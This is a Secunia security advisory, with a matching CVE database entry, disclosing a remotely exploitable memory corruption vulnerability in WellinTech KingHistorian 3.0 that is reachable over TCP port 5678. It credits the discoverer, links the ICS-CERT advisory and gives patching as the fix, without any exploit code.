http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0058 | CVE-2012-2559 | WellinTech KingHistorian Memory corruption vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
WellinTech KingHistorian 3.0 allows remote attackers to execute arbitrary code or cause a denial of service (invalid pointer write) via a crafted packet to TCP port 5678. WellinTech KingHistorian is a data storage platform. WellinTech KingHistorian is prone to a memory corruption vulnerability. Failed exploit attempts will result in a denial-of-service condition.
WellinTech KingHistorian 3.0 is vulnerable. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
KingHistorian Memory Corruption Vulnerability
SECUNIA ADVISORY ID:
SA49765
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49765/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
RELEASE DATE:
2012-07-09
DISCUSS ADVISORY:
http://secunia.com/advisories/49765/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49765/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in KingHistorian, which can be
exploited by malicious people to compromise a vulnerable system.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in version 3.0.
SOLUTION:
Install patch.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
ICS-CERT credits Dillon Beresford.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-185-01.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------